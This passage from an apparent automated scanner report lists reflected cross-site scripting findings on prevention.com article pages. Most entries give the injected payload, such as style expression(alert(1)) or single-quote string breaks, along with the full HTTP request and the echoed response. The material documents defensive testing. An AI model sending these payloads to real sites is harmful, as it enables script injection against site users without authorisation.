HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Cache-Control: max-age=1800
Date: Thu, 10 Mar 2011 17:04:52 GMT
Connection: close
Connection: Transfer-Encoding
X-N: S
Content-Length: 68628


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>


<head>
   
...[SNIP]...
rom non-JavaScript browsers
       var ord=Math.random()*10000000000000000;
       var tile= 1;
       var num = ord + "?";
       
       
           var topic= "toolsfinders";
                           
       
                           var sbtpc= "bmicalculatora9cb4</script><script>alert(1)</script>188bcef6d60";
       
       
                           var cat= "";
       
       
       var    querystring = location.search.substring(1);
       var querystringArray = querystring.split("&");
       var siteParam = 'prevention';
       var testPar
...[SNIP]...

2.94. http://www.prevention.com/health/cook/everyday-recipes/healthy-recipes-quick-and-easy-ways-to-use-pineapple/article/9a9b65680a90e210VgnVCM10000030281eac____ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.prevention.com
Path:   /health/cook/everyday-recipes/healthy-recipes-quick-and-easy-ways-to-use-pineapple/article/9a9b65680a90e210VgnVCM10000030281eac____

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload f3fea'style%3d'x%3aexpression(alert(1))'9d40cdf2b5c was submitted in the REST URL parameter 3. This input was echoed as f3fea'style='x:expression(alert(1))'9d40cdf2b5c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /health/cook/everyday-recipesf3fea'style%3d'x%3aexpression(alert(1))'9d40cdf2b5c/healthy-recipes-quick-and-easy-ways-to-use-pineapple/article/9a9b65680a90e210VgnVCM10000030281eac____ HTTP/1.1
Host: www.prevention.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=euowlnyzs8ta0e5k; PVNCURURL=http://www.prevention.com/cda/homepage.do?cm_sp=Network%20Banner-_-PV-_-Rodale.com; __qca=P0-1842843424-1299775204149;

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 10 Mar 2011 17:06:15 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 86095

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>


<!-- Get the reqURL and pas
...[SNIP]...
<input type='hidden' id='category_core' value='Cook-Everyday Recipesf3fea'style='x:expression(alert(1))'9d40cdf2b5c'>
...[SNIP]...

2.95. http://www.prevention.com/health/cook/everyday-recipes/healthy-recipes-quick-and-easy-ways-to-use-pineapple/article/9a9b65680a90e210VgnVCM10000030281eac____ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.prevention.com
Path:   /health/cook/everyday-recipes/healthy-recipes-quick-and-easy-ways-to-use-pineapple/article/9a9b65680a90e210VgnVCM10000030281eac____

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8a938'%3b9442c45c8e was submitted in the REST URL parameter 3. This input was echoed as 8a938';9442c45c8e in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /health/cook/everyday-recipes8a938'%3b9442c45c8e/healthy-recipes-quick-and-easy-ways-to-use-pineapple/article/9a9b65680a90e210VgnVCM10000030281eac____ HTTP/1.1
Host: www.prevention.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=euowlnyzs8ta0e5k; PVNCURURL=http://www.prevention.com/cda/homepage.do?cm_sp=Network%20Banner-_-PV-_-Rodale.com; __qca=P0-1842843424-1299775204149;

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 10 Mar 2011 17:07:05 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 90132

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>


<!-- Get the reqURL and pas
...[SNIP]...
<a href="http://www.facebook.com/sharer.php?u=http://www.prevention.com/health/cook/everyday-recipes8a938';9442c45c8e/healthy-recipes-quick-and-easy-ways-to-use-pineapple/article/9a9b65680a90e210VgnVCM10000030281eac____&title='
                                                   + pageTitle
                                                   + '" title="Share on Facebook." rel="nofollow">
...[SNIP]...

2.96. http://www.prevention.com/health/cook/everyday-recipes/healthy-recipes-quick-and-easy-ways-to-use-pineapple/article/9a9b65680a90e210VgnVCM10000030281eac____ [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.prevention.com
Path:   /health/cook/everyday-recipes/healthy-recipes-quick-and-easy-ways-to-use-pineapple/article/9a9b65680a90e210VgnVCM10000030281eac____

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 77598'%3bcbbca8dfe77 was submitted in the REST URL parameter 4. This input was echoed as 77598';cbbca8dfe77 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /health/cook/everyday-recipes/healthy-recipes-quick-and-easy-ways-to-use-pineapple77598'%3bcbbca8dfe77/article/9a9b65680a90e210VgnVCM10000030281eac____ HTTP/1.1
Host: www.prevention.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=euowlnyzs8ta0e5k; PVNCURURL=http://www.prevention.com/cda/homepage.do?cm_sp=Network%20Banner-_-PV-_-Rodale.com; __qca=P0-1842843424-1299775204149;

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 10 Mar 2011 17:07:35 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 87337

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>


<!-- Get the reqURL and pas
...[SNIP]...
<a href="http://www.facebook.com/sharer.php?u=http://www.prevention.com/health/cook/everyday-recipes/healthy-recipes-quick-and-easy-ways-to-use-pineapple77598';cbbca8dfe77/article/9a9b65680a90e210VgnVCM10000030281eac____&title='
                                                   + pageTitle
                                                   + '" title="Share on Facebook." rel="nofollow">
...[SNIP]...

2.97. http://www.prevention.com/health/cook/everyday-recipes/healthy-recipes-quick-and-easy-ways-to-use-pineapple/article/9a9b65680a90e210VgnVCM10000030281eac____ [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.prevention.com
Path:   /health/cook/everyday-recipes/healthy-recipes-quick-and-easy-ways-to-use-pineapple/article/9a9b65680a90e210VgnVCM10000030281eac____

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload b3a68'style%3d'x%3aexpression(alert(1))'8aefa16a7c1 was submitted in the REST URL parameter 5. This input was echoed as b3a68'style='x:expression(alert(1))'8aefa16a7c1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /health/cook/everyday-recipes/healthy-recipes-quick-and-easy-ways-to-use-pineapple/articleb3a68'style%3d'x%3aexpression(alert(1))'8aefa16a7c1/9a9b65680a90e210VgnVCM10000030281eac____ HTTP/1.1
Host: www.prevention.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=euowlnyzs8ta0e5k; PVNCURURL=http://www.prevention.com/cda/homepage.do?cm_sp=Network%20Banner-_-PV-_-Rodale.com; __qca=P0-1842843424-1299775204149;

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Cache-Control: max-age=1793
Date: Thu, 10 Mar 2011 17:08:37 GMT
Connection: close
Connection: Transfer-Encoding
X-N: S
Content-Length: 72535

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>
   
   <titl
...[SNIP]...
<input type='hidden' id='category_core' value='Cook-Everyday Recipes-Healthy Recipes Quick And Easy Ways To Use Pineapple-Articleb3a68'style='x:expression(alert(1))'8aefa16a7c1'>
...[SNIP]...

2.98. http://www.prevention.com/health/cook/everyday-recipes/healthy-recipes-quick-and-easy-ways-to-use-pineapple/article/9a9b65680a90e210VgnVCM10000030281eac____ [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.prevention.com
Path:   /health/cook/everyday-recipes/healthy-recipes-quick-and-easy-ways-to-use-pineapple/article/9a9b65680a90e210VgnVCM10000030281eac____

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8b5a2'%3bad663f93c42 was submitted in the REST URL parameter 6. This input was echoed as 8b5a2';ad663f93c42 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /health/cook/everyday-recipes/healthy-recipes-quick-and-easy-ways-to-use-pineapple/article/9a9b65680a90e210VgnVCM10000030281eac____8b5a2'%3bad663f93c42 HTTP/1.1
Host: www.prevention.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=euowlnyzs8ta0e5k; PVNCURURL=http://www.prevention.com/cda/homepage.do?cm_sp=Network%20Banner-_-PV-_-Rodale.com; __qca=P0-1842843424-1299775204149;

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 10 Mar 2011 17:10:08 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 87373

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>


<!-- Get the reqURL and pas
...[SNIP]...
a href="http://www.facebook.com/sharer.php?u=http://www.prevention.com/health/cook/everyday-recipes/healthy-recipes-quick-and-easy-ways-to-use-pineapple/article/9a9b65680a90e210VgnVCM10000030281eac____8b5a2';ad663f93c42&title='
                                                   + pageTitle
                                                   + '" title="Share on Facebook." rel="nofollow">
...[SNIP]...

2.99. http://www.prevention.com/health/fitness/belly-abs/flatten-your-belly/article/613888dc78803110VgnVCM10000013281eac____ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.prevention.com
Path:   /health/fitness/belly-abs/flatten-your-belly/article/613888dc78803110VgnVCM10000013281eac____

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9b1b4'%3b959f1b413af was submitted in the REST URL parameter 3. This input was echoed as 9b1b4';959f1b413af in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /health/fitness/belly-abs9b1b4'%3b959f1b413af/flatten-your-belly/article/613888dc78803110VgnVCM10000013281eac____ HTTP/1.1
Host: www.prevention.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=euowlnyzs8ta0e5k; PVNCURURL=http://www.prevention.com/cda/homepage.do?cm_sp=Network%20Banner-_-PV-_-Rodale.com; __qca=P0-1842843424-1299775204149;

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 10 Mar 2011 17:07:20 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 91724

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>


<!-- Get the reqURL and pas
...[SNIP]...
<a href="http://www.facebook.com/sharer.php?u=http://www.prevention.com/health/fitness/belly-abs9b1b4';959f1b413af/flatten-your-belly/article/613888dc78803110VgnVCM10000013281eac____&title='
                                                   + pageTitle
                                                   + '" title="Share on Facebook." rel="nofollow">
...[SNIP]...

2.100. http://www.prevention.com/health/fitness/belly-abs/flatten-your-belly/article/613888dc78803110VgnVCM10000013281eac____ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.prevention.com
Path:   /health/fitness/belly-abs/flatten-your-belly/article/613888dc78803110VgnVCM10000013281eac____

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 3c65c'style%3d'x%3aexpression(alert(1))'bc3f9e30175 was submitted in the REST URL parameter 3. This input was echoed as 3c65c'style='x:expression(alert(1))'bc3f9e30175 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /health/fitness/belly-abs3c65c'style%3d'x%3aexpression(alert(1))'bc3f9e30175/flatten-your-belly/article/613888dc78803110VgnVCM10000013281eac____ HTTP/1.1
Host: www.prevention.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=euowlnyzs8ta0e5k; PVNCURURL=http://www.prevention.com/cda/homepage.do?cm_sp=Network%20Banner-_-PV-_-Rodale.com; __qca=P0-1842843424-1299775204149;

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 10 Mar 2011 17:06:24 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 94647

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>


<!-- Get the reqURL and pas
...[SNIP]...
<input type='hidden' id='category_core' value='Fitness-Belly Abs3c65c'style='x:expression(alert(1))'bc3f9e30175'>
...[SNIP]...

2.101. http://www.prevention.com/health/fitness/belly-abs/flatten-your-belly/article/613888dc78803110VgnVCM10000013281eac____ [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.prevention.com
Path:   /health/fitness/belly-abs/flatten-your-belly/article/613888dc78803110VgnVCM10000013281eac____

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3e4ec'%3b69855b3c645 was submitted in the REST URL parameter 4. This input was echoed as 3e4ec';69855b3c645 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /health/fitness/belly-abs/flatten-your-belly3e4ec'%3b69855b3c645/article/613888dc78803110VgnVCM10000013281eac____ HTTP/1.1
Host: www.prevention.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=euowlnyzs8ta0e5k; PVNCURURL=http://www.prevention.com/cda/homepage.do?cm_sp=Network%20Banner-_-PV-_-Rodale.com; __qca=P0-1842843424-1299775204149;

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 10 Mar 2011 17:07:49 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 91489

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>


<!-- Get the reqURL and pas
...[SNIP]...
<a href="http://www.facebook.com/sharer.php?u=http://www.prevention.com/health/fitness/belly-abs/flatten-your-belly3e4ec';69855b3c645/article/613888dc78803110VgnVCM10000013281eac____&title='
                                                   + pageTitle
                                                   + '" title="Share on Facebook." rel="nofollow">
...[SNIP]...

2.102. http://www.prevention.com/health/fitness/belly-abs/flatten-your-belly/article/613888dc78803110VgnVCM10000013281eac____ [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.prevention.com
Path:   /health/fitness/belly-abs/flatten-your-belly/article/613888dc78803110VgnVCM10000013281eac____

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload a7661'style%3d'x%3aexpression(alert(1))'d1c79f48836 was submitted in the REST URL parameter 5. This input was echoed as a7661'style='x:expression(alert(1))'d1c79f48836 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /health/fitness/belly-abs/flatten-your-belly/articlea7661'style%3d'x%3aexpression(alert(1))'d1c79f48836/613888dc78803110VgnVCM10000013281eac____ HTTP/1.1
Host: www.prevention.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=euowlnyzs8ta0e5k; PVNCURURL=http://www.prevention.com/cda/homepage.do?cm_sp=Network%20Banner-_-PV-_-Rodale.com; __qca=P0-1842843424-1299775204149;

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Cache-Control: max-age=1790
Date: Thu, 10 Mar 2011 17:09:03 GMT
Connection: close
Connection: Transfer-Encoding
X-N: S
Content-Length: 74480

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>
   
   <titl
...[SNIP]...
<input type='hidden' id='category_core' value='Fitness-Belly Abs-Flatten Your Belly-Articlea7661'style='x:expression(alert(1))'d1c79f48836'>
...[SNIP]...

2.103. http://www.prevention.com/health/fitness/belly-abs/flatten-your-belly/article/613888dc78803110VgnVCM10000013281eac____ [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.prevention.com
Path:   /health/fitness/belly-abs/flatten-your-belly/article/613888dc78803110VgnVCM10000013281eac____

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 75b98'%3b7f1c107c0f0 was submitted in the REST URL parameter 6. This input was echoed as 75b98';7f1c107c0f0 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /health/fitness/belly-abs/flatten-your-belly/article/613888dc78803110VgnVCM10000013281eac____75b98'%3b7f1c107c0f0 HTTP/1.1
Host: www.prevention.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=euowlnyzs8ta0e5k; PVNCURURL=http://www.prevention.com/cda/homepage.do?cm_sp=Network%20Banner-_-PV-_-Rodale.com; __qca=P0-1842843424-1299775204149;

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 10 Mar 2011 17:10:17 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 88885

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>


<!-- Get the reqURL and pas
...[SNIP]...
<a href="http://www.facebook.com/sharer.php?u=http://www.prevention.com/health/fitness/belly-abs/flatten-your-belly/article/613888dc78803110VgnVCM10000013281eac____75b98';7f1c107c0f0&title='
                                                   + pageTitle
                                                   + '" title="Share on Facebook." rel="nofollow">
...[SNIP]...

2.104. http://www.prevention.com/health/fitness/cardio/live-the-fat-burning-life-126/article/e9e03a2877df9110VgnVCM20000012281eac____ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.prevention.com
Path:   /health/fitness/cardio/live-the-fat-burning-life-126/article/e9e03a2877df9110VgnVCM20000012281eac____

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b2db1'%3ba3c6da0aec5 was submitted in the REST URL parameter 3. This input was echoed as b2db1';a3c6da0aec5 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /health/fitness/cardiob2db1'%3ba3c6da0aec5/live-the-fat-burning-life-126/article/e9e03a2877df9110VgnVCM20000012281eac____ HTTP/1.1
Host: www.prevention.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=euowlnyzs8ta0e5k; PVNCURURL=http://www.prevention.com/cda/homepage.do?cm_sp=Network%20Banner-_-PV-_-Rodale.com; __qca=P0-1842843424-1299775204149;

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 10 Mar 2011 17:07:42 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 89109

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>


<!-- Get the reqURL and pas
...[SNIP]...
<a href="http://www.facebook.com/sharer.php?u=http://www.prevention.com/health/fitness/cardiob2db1';a3c6da0aec5/live-the-fat-burning-life-126/article/e9e03a2877df9110VgnVCM20000012281eac____&title='
                                                   + pageTitle
                                                   + '" title="Share on Facebook." rel="nofollow">
...[SNIP]...

2.105. http://www.prevention.com/health/fitness/cardio/live-the-fat-burning-life-126/article/e9e03a2877df9110VgnVCM20000012281eac____ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.prevention.com
Path:   /health/fitness/cardio/live-the-fat-burning-life-126/article/e9e03a2877df9110VgnVCM20000012281eac____

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 7ccb0'style%3d'x%3aexpression(alert(1))'a574e26ad56 was submitted in the REST URL parameter 3. This input was echoed as 7ccb0'style='x:expression(alert(1))'a574e26ad56 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /health/fitness/cardio7ccb0'style%3d'x%3aexpression(alert(1))'a574e26ad56/live-the-fat-burning-life-126/article/e9e03a2877df9110VgnVCM20000012281eac____ HTTP/1.1
Host: www.prevention.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=euowlnyzs8ta0e5k; PVNCURURL=http://www.prevention.com/cda/homepage.do?cm_sp=Network%20Banner-_-PV-_-Rodale.com; __qca=P0-1842843424-1299775204149;

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 10 Mar 2011 17:06:36 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 96686

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>


<!-- Get the reqURL and pas
...[SNIP]...
<input type='hidden' id='category_core' value='Fitness-Cardio7ccb0'style='x:expression(alert(1))'a574e26ad56'>
...[SNIP]...

2.106. http://www.prevention.com/health/fitness/cardio/live-the-fat-burning-life-126/article/e9e03a2877df9110VgnVCM20000012281eac____ [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.prevention.com
Path:   /health/fitness/cardio/live-the-fat-burning-life-126/article/e9e03a2877df9110VgnVCM20000012281eac____

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b6145'%3b6808541011e was submitted in the REST URL parameter 4. This input was echoed as b6145';6808541011e in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /health/fitness/cardio/live-the-fat-burning-life-126b6145'%3b6808541011e/article/e9e03a2877df9110VgnVCM20000012281eac____ HTTP/1.1
Host: www.prevention.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=euowlnyzs8ta0e5k; PVNCURURL=http://www.prevention.com/cda/homepage.do?cm_sp=Network%20Banner-_-PV-_-Rodale.com; __qca=P0-1842843424-1299775204149;

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 10 Mar 2011 17:08:14 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 91555

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>


<!-- Get the reqURL and pas
...[SNIP]...
<a href="http://www.facebook.com/sharer.php?u=http://www.prevention.com/health/fitness/cardio/live-the-fat-burning-life-126b6145';6808541011e/article/e9e03a2877df9110VgnVCM20000012281eac____&title='
                                                   + pageTitle
                                                   + '" title="Share on Facebook." rel="nofollow">
...[SNIP]...

2.107. http://www.prevention.com/health/fitness/cardio/live-the-fat-burning-life-126/article/e9e03a2877df9110VgnVCM20000012281eac____ [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.prevention.com
Path:   /health/fitness/cardio/live-the-fat-burning-life-126/article/e9e03a2877df9110VgnVCM20000012281eac____

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 41d5a'style%3d'x%3aexpression(alert(1))'b8abaa4533d was submitted in the REST URL parameter 5. This input was echoed as 41d5a'style='x:expression(alert(1))'b8abaa4533d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /health/fitness/cardio/live-the-fat-burning-life-126/article41d5a'style%3d'x%3aexpression(alert(1))'b8abaa4533d/e9e03a2877df9110VgnVCM20000012281eac____ HTTP/1.1
Host: www.prevention.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=euowlnyzs8ta0e5k; PVNCURURL=http://www.prevention.com/cda/homepage.do?cm_sp=Network%20Banner-_-PV-_-Rodale.com; __qca=P0-1842843424-1299775204149;

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Cache-Control: max-age=1797
Date: Thu, 10 Mar 2011 17:09:32 GMT
Connection: close
Connection: Transfer-Encoding
X-N: S
Content-Length: 74688

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>
   
   <titl
...[SNIP]...
<input type='hidden' id='category_core' value='Fitness-Cardio-Live The Fat Burning Life 126-Article41d5a'style='x:expression(alert(1))'b8abaa4533d'>
...[SNIP]...

